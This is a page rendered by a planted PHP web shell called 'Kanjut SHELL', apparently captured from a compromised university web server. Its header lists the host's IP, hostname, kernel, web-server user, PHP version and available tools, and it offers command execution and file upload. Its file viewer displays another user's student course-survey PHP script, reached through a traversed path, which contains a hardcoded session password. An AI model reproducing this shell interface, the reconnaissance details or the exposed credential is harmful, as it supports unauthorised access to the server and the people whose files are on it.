Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.145.93.132
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/jahight/../jdgoode/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/jahight/../jdgoode/www/nextsession.php
<?php        session_start(); ?>
<?php
	if($_SESSION['pass'] != 'ch7hw')
                print "Invalid Login password.";
        else
        {
?>
<?php
	$name= $_POST['fname'];
	$gender= $_POST['gender'];
	$grade= $_POST['grade'];
	$course= $_POST['course'];
	$_SESSION['name']=$name;
	$_SESSION['gender']=$gender;
	$_SESSION['grade']=$grade;
	$_SESSION['course']=$course;
?>
<HR>
<FORM action session3.php method=post>
Was your instructor fair and honest during this course?<P>
<input type=radio name=fair value=SA checked> Strongly Agree<P>
<input type=radio name=fair value=A> Agree<P>
<input type=radio name=fair value=DA> Disagree<P>
Did you find your classmates easy to work with?<P>
<input type=radio name=mate value=SA checked> Strongly Agree<P>
<input type=radio name=mate value=A> Agree<P>
<input type=radio name=mate value=DA> Disagree<P>
Are you not entertained?<P>
<input type=radio name=not value=SA checked> Strongly Agree<P>
<input type=radio name=not value=A> Agree<P>
<input type=radio name=not value=DA> Disagree<P>
<textarea rows=4 cols=50 name="Comments">
Questions, comments, or concerns here.
</textarea>
        <input type=submit value=Click to Submit>
        <input type=reset value=Restart>

</Form>
<?php
        }
?>

Stv3n404 - 2023